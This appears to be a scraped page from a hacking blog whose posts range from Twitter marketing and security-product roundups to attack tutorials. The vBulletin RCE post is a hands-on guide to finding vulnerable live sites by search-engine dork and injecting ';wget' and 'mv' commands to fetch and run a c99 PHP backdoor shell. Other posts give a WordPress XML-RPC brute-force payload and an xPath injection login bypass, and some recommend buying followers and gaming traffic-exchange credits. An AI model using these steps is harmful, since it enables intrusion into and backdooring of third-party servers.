Latest Post
Sign up for FREE daily Updates.

How to use Twitter to promote your business online

Twitter can be a very powerful tool for marketing any business or website online, and by using Twitter, a person can easily reach thousands, hundreds of thousands or even millions of potential customers consistently.

Tweeting Consistently
Once a person creates a profile for their business or for their website on Twitter, they should tweet consistently and update their profile consistently. Tweeting consistently will ensure that their Twitter followers are engaged in the information that they're posting, and usually, tweeting consistently can help a person to obtain new followers for their Twitter account.

Respond To Tweets
When a person has a Twitter account, people can send them tweets, or Twitter users can direct tweets to their Twitter profile. This is an excellent way for a business to connect with its customers and with its potential customers.

If a person has any questions for a business owner, they can easily ask the business owner those questions on Twitter. In addition, a question that is asked by one customer or one potential customer on Twitter is likely a question that many other people have, so when a business owner answers a question from one person, they are likely answering a question that many other people have as well.

Gaining More Followers

In order to reach a large amount of people on Twitter, it's vital to gain a large amount of followers. There are many ways to gain followers on Twitter, and one of the ways is to buy Twitter followers.

When a business owner buys Twitter followers, they should make sure that the Twitter followers that they bought are real and active. The more active that Twitter followers are, the more successful that the marketing strategy of a business on Twitter will be.

Following Other Twitter Users

In addition to gaining followers on Twitter, a business should follow other Twitter users. Following other Twitter users helps to promote interactivity among users on Twitter, and in addition, a business that follows many other people and many other profiles is likely to gain more followers much more quickly for its Twitter profile.

Posting Funny And Interesting Information

A business owner should frequently post funny and interesting information and content on Twitter. Posting funny, interesting and informative content will help to ensure that a person's Twitter followers stay interested and engaged, and in addition, posting funny and interesting content can increase the likelihood that the Twitter followers of a business profile will retweet the tweets of the business owner.

When Twitter users retweet content that a business has posted, that content can easily reach hundreds of thousands or even millions of other Twitter followers very quickly, and as a result, a business can very easily reach many more potential customers by having its followers retweet content that it has tweeted.

In addition, a business owner should also post deals and discounts for certain products and services sporadically by using their Twitter account. Posting deals and discounts will attract new customers to the business, and these deals and discounts make it likely that customers that have already placed orders with a business will place more orders in the near future. 

About Author: This article was written by Andy G, a tech geek and Linux fan from Austria. At the present moment he maintains firmware 
and driver download website called


5 Best Joomla Security Extensions For You to Breathe Easy

Apart from WordPress and Drupal content management systems, Joomla is the most popular CMS used all over the world to power websites of all sorts and sizes. Just like any other open-source CMS, Joomla powered sites also have to deal with hacking attacks. In fact, almost every day Joomla powered site encounter callous hackers who mutilate website pages, upload backdoors and steal or delete sensitive information. And sadly, most of the attacks cost website owners substantial amount of time and money in getting the damage fixed. And so, it becomes needful for website owners take all the possible measures into account that helps to strengthen security of their Joomla site.

In this post we have come up with a list of remarkably useful Joomla extensions that helps to secure your Joomla website. 



jHackGuard is an extension designed by Siteground that helps to protect the websites of Joomla users from being hacked. The extension is made publicly available to Joomla site owners, irrespective of whether they're using Siteground hosting services or not. This extension is a blend of a security plugin (that does the system work) and component (that helps to handle configurations) – that helps to protect a Joomla site by filtering the user's input data and integrating more PHP security settings. But, the plugin is disabled so that filters don't prevent authenticated administrators from performing their administrative tasks.

jHackGuard is compatible with Joomla version 3 and higher. And so, if you want to protect your site security running on an older Joomla version, you can choose to download the appropriate versions of jHackGuard for the older Joomla versions such as jHackGuard for Joomla 1.5 or other.

Akeeba Backup

Akeeba Backup formerly known as JoomlaPack is an open-source and free backup component that helps in creating a full website backup – that can be used to restore your site on any server running Joomla powered sites. It lets you create a backup of your website in just a single archive, including all the files, a “database snapshot” and an “installer”.
The best aspect about this extension is that it runs an AJAX-powered backup and restore process that helps to prevent server timeouts – even when you're running a large website. Besides, you can choose to create a backup of only your website files or database. It is compatible with Joomla version 2.5 or 3.x only.


HTTP Verb Tampering Demo/Example/Tutorial

What is HTTP Verb?

  •  According to Wiki "The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems.  HTTP is the foundation of data communication for the World Wide Web.

  • Verb is nothing but HTTP methods used to indicate the desired action to be performed on the identified resource.

-  List of some basic HTTP Verb or Methods
  • GET
  • HEAD
  • POST 
  • PUT

What is HTTP Verb Tampering? 

It's a method to bypass a defense technique by tampering the verb. Some secret directories have restricted access by  basic authentication. This directories are protected by the .htaccess file which can be easily exploited. This attack is a result of a Apache  htaccess file misconfiguration .

An administrator, limits the access to the private resource or directory just via POST request method. See the vulnerable code below.

Here AuthUserFile is the directory to the .htpasswd file which contains the username & password in encrypted format.

require valid-user

It just limits the POST method & matches the credentials that saved in htpasswd file, if wrong error page shows up.

Here the administrator has limited POST method, but also not blacklisted other methods?. This means any requests via other method would lead the attacker having access to the protected  private resources or directory. Below i have provided a video DEMO of  successful exploitation of an HTTP Verb tampering vulnerability via Live HTTP Headers ( Firefox add-on) on AT&T sub domain (Reported & Fixed). In the next post i will be showing you various ways to fix or apply a patch to this vulnerability .


<div class="hreview"> <span class="item"> <span class="fn">HTTP Verb Tampering Demo/Example/Tutorial </span><br/> </span> Reviewed by <span class="reviewer">Rishal Dwivedi</span>on <span class="dtreviewed">Sep 21 2014<span title="YYYY-MM-DD" class="value-title"></span><br/> </span> Rating: <span class="rating">5</span></div>

Best Traffic Exchange service website | Hitleap

There's a huge demand for traffic exchange websites. You can find "N" no. of websites out there on internet providing the service of traffic exchange. After having an experience with all of them, i came to the conclusion  Hitleap is the one of the best & top website in terms of their services, monetary profit & website performance. The website works by earning minutes by surfing others website via Hitleap viewer software & then spending them on getting traffic on your website. You can earn number of  minutes easily just by surfing others website via the hit leap viewer software, just open & let it earn minutes for you. The minutes you will be using later in order to get traffic to your submitted website. Depending upon the minutes you will be getting traffic to your URL. The submitted website needs to be approved by their moderator which is done within fraction of seconds. It also provides a feature for setting  how many second's or minutes an visitor should stay on your website.

Earning via HitLeap ?

- Some websites provide credits just by visiting the URL, you can mask them & submit it to hitleap in order to to sit back & earn. ( Will be covering this in later tutorials briefly)

- Referrals ( 10% of the minutes your referrals earn
20% of the cash value of any purchase )

Click on the below banner to visit the website & Register yourself.

Free Traffic

Mobile security infestation [Infographics]

The explosion in popularity of mobile devices has changed the way that people go about their daily lives. Their reliance on the efficiency and speed of these gadgets has made location--often--irrelevant. However, with the reliance comes risk; the number of viruses and hackers lurking for unencrypted data has risen dramatically over the past few years, a number closely related to the rise in smartphone and tablet usage over that same period of time.

This infographic, provided by, is an interesting look at mobile security, how it is being exploited, and the future of safe usage on mobile an interesting look at mobile security, how it is being exploited, and the future of safe usage on mobile devices.

 Russel Cooke is a journalist based in Louisville, KY. His love of technology often drives his stories, which also center around social media, content creation, and marketing. You can follow him on Twitter @RusselCooke2.


Wordpress XML-RPC Brute Force Attack Vulnerability

Today i'll be sharing a easy & quite  interesting tutorial on Wordpress XML-RPC Brute Force Attack.
As we all know nowadays when every an attacker gets his hands on a WordPress website, the first thing he would try to do in order to compromise the website is a brute force attack. The attacker loads a list of user & password combination in order to guess the correct one. Its always the first & mandatory option to try in point of view of a newbie attacker. The result of an increase in brute force attack day buy day, the developers have started using Login captcha plugins to protect them selves form such attack.

XML-RPC is a word press interface & this functionality is turned by default since WordPress 3.5. Recently we have seen very critical vulnerability been found in the same which effected a quarter of the internet - Ping Back DDOS Vulnerability, Arbitrary code Execution etc. Recently it has came to known that attackers are taking advent of the XML-RPC wp.getUsersBlogs method in order to launch a brute force attack against the website. In XML-RPC many of the calls need the credentials in order to implement. Then attacker can try different combinations on user & passwords. The output is thrown on the webpage weather its valid or invalid.

Step by step guide -

 - Locate the XMLRPC on the target website - localhost/xmlrpc.php

- Send a POST request with the following code given below.

<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value> <string>user</string></value></param>  <param><value><string>password</string></value></param></params></methodCall>

- Check the response

If wrong combination - faultCode


If right - isAdmin

Hope you all liked this tutorial.  Any queries? Drop it down in comments!.


Malware: How we are Infected [InfoGraphic]

So you have a computer, but if it was infected with a virus, what would you do? Would you even know it was there? It is a well-known fact that over 32% of all computers in the world have malware of some sort. Today we will be talking about the infamous computer virus and what it is.

So let's start with something you all have probably heard of, Malware. Malware is a program made to infiltrate your computer, disable parts of it, and thus gain access to your hard drive, search history and such to aid with stealing information. However, there are other types of malware out there. Let's get to know them and how much of the 32% they infect.

At 57%, first we have the virus. This is a software that has the capability to copy itself and send itself into other folders. Then there is the "Trojan" at 21%. The Trojan is malicious software that hides on the internet disguised as some sort of program or free item, and ce you download it, you will soon discover it is malicious. But the Trojan has a brother at 7%, called the "Trojan Downloader". This type of virus does the same thing as the simple Trojan, but once on your computer it downloads more viruses and software, then begins to use those programs.

Then at 3% there is the "Exploit", which finds a glitch, bug or system error and uses that to hack into your computer. Next we have the "Worm" at 2%, this malicious bug works the same as a Trojan, but then copies and pastes itself across your computer network.

But not all viruses seem so bad when you get them, for instance the "Adware" at 3%. This type of virus infects your computer so nothing happens at first, but once you log into your web browser, then immediately your screen will be flooded with ads. There is also the "Monitoring Tool" with 2% of the 32% infected. This malware infects your computer and hides, not doing anything but monitoring your activity, (Search history, keyboard history etc.) and then sends those back to a remote server.

There is also one of the worst at 1%, the "Back Door". This virus infects your computer remotely, not allowing your anti-virus security to even detect it, but sure enough it does. And lastly we have one of the worst but luckily at a low percentage of 0.01%, "Spyware". This diabolically designed software infects your computer and takes the most important pieces of information it can find and sends it back to wherever it came from. This information is generally passwords, credit card numbers and other sensitive information.
All of these viruses have devastating effects. Last year there were 27 million strains of malware made, which means 74,000 new viruses are created every day. The number of homes in the United States that experience spam is 24 million. The number of homes with serious viruses in the last 2 years is 16 million, and the number of houses that had spyware in the last 6 months is 6 million. But most devastating of all, over 1 million of all homes have lost money to spyware in the last year. Another devastating fact is that Viruses cost the world 4.55 billion USD every year.

So be safe, don't download anything you are unsure of, and be sure to have an anti-virus software. But most importantly learn how to detect these programs when you get them.


Follow The Following Steps To Make Facebook Page With No Name,

    1) First of all, click here to create your new Facebook page.

    2) Select a Category. Example- Entertainment and after that choose a category.

       3) Copy the code inside the brackets [ ᠌᠌᠌᠌᠌] and paste in the name field.
     4) Click on I agree to Facebook Pages Terms and then Get Stated And All Done You Can    See A Page With No Name Is Created 


iOS Update Quashes Dangerous SSL Bug


Photo by: Duncan Hull

If you haven't gotten the iOS 7.0.6 update, you need to stop what you're doing and get it now. There's a dangerous SSL bug that can hurt you in numerous ways if you don't take care of it right away by updating your Apple operating system. Even if you have an older version, you're going to want to make sure you're protected and have the latest OS available for your particular mobile device.

Back in February of this year, it came out that not updating could lead to bad people being able to read and modify encrypted communications whether people were using iPhones, iPads or other iOS devices. As you might imagine, this upset a lot of people. The good news is that Apple was pretty quick at making sure an update was available for people who downloaded it.

And yet that's part of the problem - not everyone updates their operating system on their own, especially on their phone or mobile device. Some people have claimed that it wasn't a flaw and was built-in iOS as a means for people - like the NSA perhaps - to be able to spy on people easier. Apple denied the claims, of course, but if you Google around, you're going to find some interesting speculation about the "flaw" found in iOS.

According to Ars Technica, the problem may have gone beyond iOS mobile devices and actually affected Mac OS X users - even if they had all the current patches and updates installed! According to them, "[The] vulnerability has been confirmed in iOS versions 6.1.5, 7.0.4, and 7.0.5, and OS X 10.9.0 and 10.9.1." That's quite a wide vulnerability. And while Apple seemed to be working fast to squash the bug last month, there's a good chance that a lot of people still don't have it patched.

In order to make sure you stay safe, here are some specific tips you should follow.

  • Always Update - The first thing you want to do is make sure you ALWAYS update your OS when you find out there's a new version available.
  • Be Aware - In order to know when you should update your OS, you're going to make sure you're aware of major problems that have been found.
  • Act Quickly - The sooner you patch the vulnerable code, the sooner you're going to be safe from attacks.

While there's no guarantee your mobile devices are going to be safe and secure, you want to make sure you take whatever steps you can to guarantee that you're as safe as possible. If you have any thoughts or opinions about the latest iOS update that killed some major security flaws, feel free to leave a comment below and let us know what you're thinking.

Guest Post:

Written by: Jenny Corteza has used a City Directory Theme because it made her life as a writer a whole lot easier. She's been writing technology articles for many years now.

WhatsApp spam used by ASProx Botnet to Deliver Kuluoz Malware


Photo by: Sean MacEntee

As you probably know, Facebook bought WhatsApp for an obscene amount of money in stock earlier this year. What you might not know is that there's a lot of WhatsApp spam that is being used by ASProx Botnet to deliver nasty Kuluoz malware to unsuspecting  users. This is not good news any way you look at the situation. Keep reading if you want to know more about this as well as what you should do to stay safe.

Here's a look at some of the dates when the WhatsApp problem has made Malcovery's "Today's Top Threats" list.

  1. SEPTEMBER 19, 23, 24, 25, 26
  2. OCTOBER 2, 3, 4, 7, 8, 9, 10, 11, 16, 17, 18, 21, 22, 23, 24, 25
  3. NOVEMBER 14
  4. JANUARY 9, 13, 15, 20, 28

Looking at that list, it's easy to start wondering why nothing has been done sooner about the problem. Additionally, it really makes you wonder why Facebook paid so much for the company by offering them stock options.

Going back to November of last year, ComputerWorld published an article about how WhatsApp was one of the top five brands imitated to deliver malware with spam. That's quite a bit of recognition - and not in a good way.

Here's a look at some specific ways you can stay safe and avoid Kuluoz and other malware.

  • Use Protection - The very first thing you want to do is make sure you're using some type of protection. The good news is that you don't need to spend a lot of money to get decent anti-virus software these days.
  • Update Protection - Having protection software is nice, but if you never update it at all, you're going to find that there's still a high chance your computer will get infected and quit working correctly.
  • Be Suspicious - If you're not sure of something online, you want to err on the side of caution and not take any unnecessary risks. Even with a brand like WhatsApp - that's connected to Facebook now - you want to be very careful and know what you're doing.
  • Educate Yourself - Last but most certainly not least, you should make an effort to stay informed about how malware works and the steps you can take to protect yourself from it whenever possible. This is really the best way you can make sure your computer stays safe and virus free.

Following the advice above, there's a good chance you'll be able to avoid WhatsApp spam and not get infected with Kuluoz malware. Still, it's a good idea to pay attention and update your anti-virus software all the time. If you have any experience with WhatsApp that's negative, please leave us a comment below. 

Guest Post - 
Written by: Jenny Corteza deals with staff outsourcing all the time. She's a writer and dealing with editors and others can sometimes be a problem. Still, she loves writing articles about technology. Go figure.


What is xPath Injection? How to exploit with xPath? [Part 1]

xPath Injection occurs when inputs supplied by the users are not properly sanitized and a malicious attacker is able to send and construct a malformed xPath query for XML data with the intention to extract sensitive information to which normal users don't have access to. It is similar to SQL Injection where attackers does the same, in SQL Injection, SQL queries are made and in xPath Injection, xPath queries are made for XML data/. Queries XML is done through xPath which is type of a simple descriptive statements that allows XML query to locate certain information.

To understand more clearly how a XML document looks like, have a look below. It is a simple XML document codes to authenticate a user based upon the combination of username and password they entered.


When the username 'admin' and password 'reddit12' are entered, the following xPath query is executed

/*[0]/user[username=”admin” and

Which would return the following



Exploiting xPath Injection : Authentication Bypass

An malicious user can bypass the authentication by sending specially crafted input query.

/*[0]/user[username=”admin” and password=”reddit12”]

If an attacker submits the following malicious input:

username: admin" or "1" ="1
password: anything

the XPATH query which will be executed will be the following:

/*[0]/user[username=”admin" or "1"="1” and

The XPath query will result in authentication bypass and an attacker will be able to login to the
application as user "admin". This is because the OR clause in the XPath query is a condition which is always true. Under XPath (similar to SQL) the AND clause has precedence over the OR clause, so the XPath query will be evaluated as shown by the following pseudo-code:

username ="admin" or [TRUE AND False]
which will result in:
username ="admin" or FALSE

As the username admin is valid, the attacker will be able to login as this user.

That was a basic introduction to tell you, what xPath actually is and to exploit it. I will be dividing this post into 3 separate parts. This was the 1st part, in 2nd part I will be explaining how to extract database information through xPath Injection. In 3rd part we will be talking about some automated tools for exploiting xPath Injection.

What is Remote Code Execution? How to Hack Websites

According to Wikipedia, Remote Code Execution can be defined as “In computer security, arbitrary code execution or remote code execution is used to describe an attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process. It is commonly used in arbitrary code execution vulnerability to describe a software bug that gives an attacker a way to execute arbitrary code. A program that is designed to exploit such vulnerability is called an arbitrary code execution exploit. Most of these vulnerabilities allow the execution of machine code and most exploits therefore inject and execute shell code to give an attacker an easy way to manually run arbitrary commands. The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code execution”

vBulletin RCE Injection

Few websites running vBulletin are vulnerable to Remote Code Execution, by exploiting the vulnerability we can get our PHP backdoor shell uploaded on the website. We’ll use a dork to find the vulnerable website.

Note: Don’t keep yourself restricted when it comes to using dorks, use other search engines too other than Google, like Bing, Yahoo etc. Use of multiple search engines will help you to get more vulnerable websites.

Dork: inurl:faq.php & intext:"Warning: system() [function.system]"

Now, select any website of your choice from th search result, and go to its faq.php page. If the website is vulnerable, you will get the following on the page.

You will get an error similar to Warning: system() [function.system]: Cannot execute a blank command in [path]/faq.php(324) : eval()'d code on line 1

So, firstly upload your PHP shell on any free hosting website or you can use as it has already got an uploaded .txt shell. (We will be first uploading our shell in .txt form, and later will be changing the extension to .php after the upload process is completed.

Suppose the vulnerable website is So in order to upload our shell enter the following in the URL bar: /tmp;wget

To check if we were able to successfully upload our shell, enter the following in the URL bar /tmp;ls -la c99.txt

Were c99.txt is the name of your uploaded shell. If we were successful in uploading our shell, we see the following text on the page. (Might be a little different in some cases)
-rw-r—r—1 nobody nobody

We know that our shell is successful uploaded on the website, now it’s time to change the file format from .txt to .php in order to execute it on the server. /tmp;mv c99.txt check.php
(You can change check.php to any other name of your choice)

Now, the file format is change. It’s time to execute our shell, so to execute it enter the following in the URL bar /tmp;mv c99.txt check.php

Bingo!! We successfully exploited vBulletin Remote Code Execution Vulnerability.

Support : Blog | Hacking-Sec | PHP-Sec
Copyright © 2014. Hacking-Sec - All Rights Reserved